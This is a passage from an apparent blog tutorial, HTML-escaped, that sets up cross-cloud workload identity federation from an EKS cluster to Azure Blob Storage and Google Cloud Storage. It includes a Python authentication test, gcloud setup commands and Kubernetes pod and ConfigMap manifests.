          &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;serviceAccountToken&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
              &lt;span class="na"&gt;path&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;azure-identity-token&lt;/span&gt;
              &lt;span class="na"&gt;expirationSeconds&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="m"&gt;3600&lt;/span&gt;
              &lt;span class="na"&gt;audience&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;api://AzureADTokenExchange&lt;/span&gt;
&lt;span class="nn"&gt;---&lt;/span&gt;
&lt;span class="na"&gt;apiVersion&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;v1&lt;/span&gt;
&lt;span class="na"&gt;kind&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;ConfigMap&lt;/span&gt;
&lt;span class="na"&gt;metadata&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;azure-test-code&lt;/span&gt;
  &lt;span class="na"&gt;namespace&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;default&lt;/span&gt;
&lt;span class="na"&gt;data&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;test_azure_from_eks.py&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="pi"&gt;|&lt;/span&gt;
    &lt;span class="s"&gt;# Code will be provided below&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;Test Code (Python):&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;&lt;span class="c1"&gt;# test_azure_from_eks.py
&lt;/span&gt;&lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="n"&gt;os&lt;/span&gt;
&lt;span class="kn"&gt;from&lt;/span&gt; &lt;span class="n"&gt;azure.identity&lt;/span&gt; &lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="n"&gt;WorkloadIdentityCredential&lt;/span&gt;
&lt;span class="kn"&gt;from&lt;/span&gt; &lt;span class="n"&gt;azure.storage.blob&lt;/span&gt; &lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="n"&gt;BlobServiceClient&lt;/span&gt;
&lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="n"&gt;sys&lt;/span&gt;

&lt;span class="k"&gt;def&lt;/span&gt; &lt;span class="nf"&gt;test_azure_access&lt;/span&gt;&lt;span class="p"&gt;():&lt;/span&gt;
    &lt;span class="k"&gt;try&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
        &lt;span class="n"&gt;client_id&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;os&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;environ&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;get&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;AZURE_CLIENT_ID&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
        &lt;span class="n"&gt;tenant_id&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;os&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;environ&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;get&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;AZURE_TENANT_ID&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
        &lt;span class="n"&gt;token_file&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;os&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;environ&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;get&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;AZURE_FEDERATED_TOKEN_FILE&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;

        &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="ow"&gt;not&lt;/span&gt; &lt;span class="nf"&gt;all&lt;/span&gt;&lt;span class="p"&gt;([&lt;/span&gt;&lt;span class="n"&gt;client_id&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;tenant_id&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;token_file&lt;/span&gt;&lt;span class="p"&gt;]):&lt;/span&gt;
            &lt;span class="k"&gt;raise&lt;/span&gt; &lt;span class="nc"&gt;ValueError&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;Missing required environment variables&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;

        &lt;span class="n"&gt;credential&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nc"&gt;WorkloadIdentityCredential&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;
            &lt;span class="n"&gt;tenant_id&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="n"&gt;tenant_id&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
            &lt;span class="n"&gt;client_id&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="n"&gt;client_id&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
            &lt;span class="n"&gt;token_file_path&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="n"&gt;token_file&lt;/span&gt;
        &lt;span class="p"&gt;)&lt;/span&gt;

        &lt;span class="c1"&gt;# if you created your storage account with different name replace ekscrosscloud with your name
&lt;/span&gt;        &lt;span class="n"&gt;storage_account_url&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;https://ekscrosscloud.blob.core.windows.net&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;

        &lt;span class="n"&gt;blob_service_client&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nc"&gt;BlobServiceClient&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;
            &lt;span class="n"&gt;account_url&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="n"&gt;storage_account_url&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
            &lt;span class="n"&gt;credential&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="n"&gt;credential&lt;/span&gt;
        &lt;span class="p"&gt;)&lt;/span&gt;

        &lt;span class="n"&gt;containers&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nf"&gt;list&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;blob_service_client&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;list_containers&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;results_per_page&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="mi"&gt;5&lt;/span&gt;&lt;span class="p"&gt;))&lt;/span&gt;

        &lt;span class="nf"&gt;print&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;✅ Azure Authentication successful!&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
        &lt;span class="nf"&gt;print&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sa"&gt;f&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;Found &lt;/span&gt;&lt;span class="si"&gt;{&lt;/span&gt;&lt;span class="nf"&gt;len&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;containers&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;&lt;span class="si"&gt;}&lt;/span&gt;&lt;span class="s"&gt; containers:&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
        &lt;span class="k"&gt;for&lt;/span&gt; &lt;span class="n"&gt;container&lt;/span&gt; &lt;span class="ow"&gt;in&lt;/span&gt; &lt;span class="n"&gt;containers&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
            &lt;span class="nf"&gt;print&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sa"&gt;f&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;  - &lt;/span&gt;&lt;span class="si"&gt;{&lt;/span&gt;&lt;span class="n"&gt;container&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;name&lt;/span&gt;&lt;span class="si"&gt;}&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;

        &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="bp"&gt;True&lt;/span&gt;

    &lt;span class="k"&gt;except&lt;/span&gt; &lt;span class="nb"&gt;Exception&lt;/span&gt; &lt;span class="k"&gt;as&lt;/span&gt; &lt;span class="n"&gt;e&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
        &lt;span class="nf"&gt;print&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sa"&gt;f&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;❌ Azure Authentication failed: &lt;/span&gt;&lt;span class="si"&gt;{&lt;/span&gt;&lt;span class="nf"&gt;str&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;e&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;&lt;span class="si"&gt;}&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
        &lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="n"&gt;traceback&lt;/span&gt;
        &lt;span class="n"&gt;traceback&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;print_exc&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;
        &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="bp"&gt;False&lt;/span&gt;

&lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="n"&gt;__name__&lt;/span&gt; &lt;span class="o"&gt;==&lt;/span&gt; &lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;__main__&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
    &lt;span class="n"&gt;success&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nf"&gt;test_azure_access&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;
    &lt;span class="n"&gt;sys&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;exit&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mi"&gt;0&lt;/span&gt; &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="n"&gt;success&lt;/span&gt; &lt;span class="k"&gt;else&lt;/span&gt; &lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;Success logs:&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;If you see logs like below for the pods &lt;code&gt;kubectl logs -f -n default eks-azure-test&lt;/code&gt;, it means the EKS to Azure Authentication worked.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;✅ Azure Authentication successful!
Found 1 containers:
  - test-container
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  1.3 Authenticating to GCP from EKS
&lt;/h3&gt;

&lt;p&gt;&lt;strong&gt;Setup Steps:&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# 1. Get EKS OIDC issuer&lt;/span&gt;
&lt;span class="nv"&gt;OIDC_ISSUER&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="si"&gt;$(&lt;/span&gt;aws eks describe-cluster &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--name&lt;/span&gt; my-eks-cluster &lt;span class="nt"&gt;--region&lt;/span&gt; us-east-1 &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--query&lt;/span&gt; &lt;span class="s2"&gt;"cluster.identity.oidc.issuer"&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--output&lt;/span&gt; text&lt;span class="si"&gt;)&lt;/span&gt;

&lt;span class="c"&gt;# 2. Create Workload Identity Pool&lt;/span&gt;
gcloud auth login
gcloud config &lt;span class="nb"&gt;set &lt;/span&gt;project YOUR_PROJECT_ID
gcloud iam workload-identity-pools create eks-pool &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--location&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;global &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--display-name&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s2"&gt;"EKS Pool"&lt;/span&gt;

&lt;span class="c"&gt;# 3. Create Workload Identity Provider&lt;/span&gt;
&lt;span class="nv"&gt;PROJECT_ID&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="si"&gt;$(&lt;/span&gt;gcloud config get-value project&lt;span class="si"&gt;)&lt;/span&gt;
&lt;span class="nv"&gt;PROJECT_NUMBER&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="si"&gt;$(&lt;/span&gt;gcloud projects describe &lt;span class="k"&gt;${&lt;/span&gt;&lt;span class="nv"&gt;PROJECT_ID&lt;/span&gt;&lt;span class="k"&gt;}&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--format&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s2"&gt;"value(projectNumber)"&lt;/span&gt;&lt;span class="si"&gt;)&lt;/span&gt;
gcloud iam workload-identity-pools providers create-oidc eks-provider &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--location&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;global &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--workload-identity-pool&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;eks-pool &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--issuer-uri&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="k"&gt;${&lt;/span&gt;&lt;span class="nv"&gt;OIDC_ISSUER&lt;/span&gt;&lt;span class="k"&gt;}&lt;/span&gt;&lt;span class="s2"&gt;"&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--allowed-audiences&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s2"&gt;"//iam.googleapis.com/projects/&lt;/span&gt;&lt;span class="k"&gt;${&lt;/span&gt;&lt;span class="nv"&gt;PROJECT_NUMBER&lt;/span&gt;&lt;span class="k"&gt;}&lt;/span&gt;&lt;span class="s2"&gt;/locations/global/workloadIdentityPools/eks-pool/providers/eks-provider"&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--attribute-mapping&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s2"&gt;"google.subject=assertion.sub,attribute.namespace=assertion['kubernetes.io']['namespace'],attribute.service_account=assertion['kubernetes.io']['serviceaccount']['name']"&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--attribute-condition&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s2"&gt;"assertion.sub.startsWith('system:serviceaccount:default:eks-cross-cloud-sa')"&lt;/span&gt;

&lt;span class="c"&gt;# 4. Create GCP Service Account&lt;/span&gt;
gcloud iam service-accounts create eks-gcp-sa &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--display-name&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s2"&gt;"EKS to GCP Service Account"&lt;/span&gt;

&lt;span class="nv"&gt;GSA_EMAIL&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s2"&gt;"eks-gcp-sa@&lt;/span&gt;&lt;span class="k"&gt;${&lt;/span&gt;&lt;span class="nv"&gt;PROJECT_ID&lt;/span&gt;&lt;span class="k"&gt;}&lt;/span&gt;&lt;span class="s2"&gt;.iam.gserviceaccount.com"&lt;/span&gt;

&lt;span class="c"&gt;# 5. Create bucket and Grant GCS permissions&lt;/span&gt;
gcloud storage buckets create gs://eks-cross-cloud &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--project&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="k"&gt;${&lt;/span&gt;&lt;span class="nv"&gt;PROJECT_ID&lt;/span&gt;&lt;span class="k"&gt;}&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--location&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;us-central1 &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--uniform-bucket-level-access&lt;/span&gt;

gsutil iam ch serviceAccount:&lt;span class="k"&gt;${&lt;/span&gt;&lt;span class="nv"&gt;GSA_EMAIL&lt;/span&gt;&lt;span class="k"&gt;}&lt;/span&gt;:objectViewer gs://eks-cross-cloud

&lt;span class="c"&gt;# list buckets in the project:&lt;/span&gt;
gcloud projects add-iam-policy-binding &lt;span class="k"&gt;${&lt;/span&gt;&lt;span class="nv"&gt;PROJECT_ID&lt;/span&gt;&lt;span class="k"&gt;}&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--member&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s2"&gt;"serviceAccount:&lt;/span&gt;&lt;span class="k"&gt;${&lt;/span&gt;&lt;span class="nv"&gt;GSA_EMAIL&lt;/span&gt;&lt;span class="k"&gt;}&lt;/span&gt;&lt;span class="s2"&gt;"&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--role&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s2"&gt;"roles/storage.admin"&lt;/span&gt;

&lt;span class="c"&gt;# 6. Allow Kubernetes SA to impersonate GCP SA&lt;/span&gt;
gcloud iam service-accounts add-iam-policy-binding &lt;span class="k"&gt;${&lt;/span&gt;&lt;span class="nv"&gt;GSA_EMAIL&lt;/span&gt;&lt;span class="k"&gt;}&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--role&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;roles/iam.workloadIdentityUser &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--member&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s2"&gt;"principalSet://iam.googleapis.com/projects/&lt;/span&gt;&lt;span class="k"&gt;${&lt;/span&gt;&lt;span class="nv"&gt;PROJECT_NUMBER&lt;/span&gt;&lt;span class="k"&gt;}&lt;/span&gt;&lt;span class="s2"&gt;/locations/global/workloadIdentityPools/eks-pool/attribute.service_account/eks-cross-cloud-sa"&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;Kubernetes Manifest:&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Submit the manifest below to validate the Scenario 1.2, if authentication is working you will see success logs as shown below -&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;&lt;span class="c1"&gt;# scenario1-3-eks-to-gcp.yaml&lt;/span&gt;
&lt;span class="na"&gt;apiVersion&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;v1&lt;/span&gt;
&lt;span class="na"&gt;kind&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;Pod&lt;/span&gt;
&lt;span class="na"&gt;metadata&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;eks-gcp-test&lt;/span&gt;
  &lt;span class="na"&gt;namespace&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;default&lt;/span&gt;
&lt;span class="na"&gt;spec&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="c1"&gt;# eks-cross-cloud-sa SA is created in Scenario 1.1 above&lt;/span&gt;
  &lt;span class="na"&gt;serviceAccountName&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;eks-cross-cloud-sa&lt;/span&gt;
  &lt;span class="na"&gt;restartPolicy&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;Never&lt;/span&gt;
  &lt;span class="na"&gt;containers&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;gcp-test&lt;/span&gt;
    &lt;span class="na"&gt;image&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;python:3.11-slim&lt;/span&gt;
    &lt;span class="na"&gt;command&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
      &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="s"&gt;sh&lt;/span&gt;
      &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="s"&gt;-c&lt;/span&gt;
      &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="pi"&gt;|&lt;/span&gt;
        &lt;span class="s"&gt;pip install --no-cache-dir google-auth google-cloud-storage &amp;amp;&amp;amp; \&lt;/span&gt;
        &lt;span class="s"&gt;python /app/test_gcp_from_eks.py&lt;/span&gt;
    &lt;span class="na"&gt;env&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;GOOGLE_APPLICATION_CREDENTIALS&lt;/span&gt;
      &lt;span class="na"&gt;value&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;/var/run/secrets/workload-identity/config.json&lt;/span&gt;
    &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;GCP_PROJECT_ID&lt;/span&gt;
      &lt;span class="c1"&gt;# replace YOUR_PROJECT_ID with actual value&lt;/span&gt;
      &lt;span class="na"&gt;value&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="s"&gt;YOUR_PROJECT_ID"&lt;/span&gt;
    &lt;span class="na"&gt;volumeMounts&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;workload-identity-config&lt;/span&gt;
      &lt;span class="na"&gt;mountPath&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;/var/run/secrets/workload-identity&lt;/span&gt;
      &lt;span class="na"&gt;readOnly&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="kc"&gt;true&lt;/span&gt;
    &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;ksa-token&lt;/span&gt;
      &lt;span class="na"&gt;mountPath&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;/var/run/secrets/tokens&lt;/span&gt;
      &lt;span class="na"&gt;readOnly&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="kc"&gt;true&lt;/span&gt;
    &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;app-code&lt;/span&gt;
      &lt;span class="na"&gt;mountPath&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;/app&lt;/span&gt;
      &lt;span class="na"&gt;readOnly&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="kc"&gt;true&lt;/span&gt;
  &lt;span class="na"&gt;volumes&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;workload-identity-config&lt;/span&gt;
    &lt;span class="na"&gt;configMap&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
      &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;gcp-workload-identity-config&lt;/span&gt;
  &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;app-code&lt;/span&gt;
    &lt;span class="na"&gt;configMap&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
      &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;gcp-test-code&lt;/span&gt;
  &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;ksa-token&lt;/span&gt;
    &lt;span class="na"&gt;projected&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
      &lt;span class="na"&gt;sources&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
      &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;serviceAccountToken&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
          &lt;span class="na"&gt;path&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;eks-token&lt;/span&gt;
          &lt;span class="na"&gt;expirationSeconds&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="m"&gt;3600&lt;/span&gt;
          &lt;span class="c1"&gt;# replace PROJECT_NUMBER with actual value&lt;/span&gt;
          &lt;span class="na"&gt;audience&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="s"&gt;//iam.googleapis.com/projects/PROJECT_NUMBER/locations/global/workloadIdentityPools/eks-pool/providers/eks-provider"&lt;/span&gt;
&lt;span class="nn"&gt;---&lt;/span&gt;
&lt;span class="na"&gt;apiVersion&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;v1&lt;/span&gt;
&lt;span class="na"&gt;kind&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;ConfigMap&lt;/span&gt;
&lt;span class="na"&gt;metadata&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
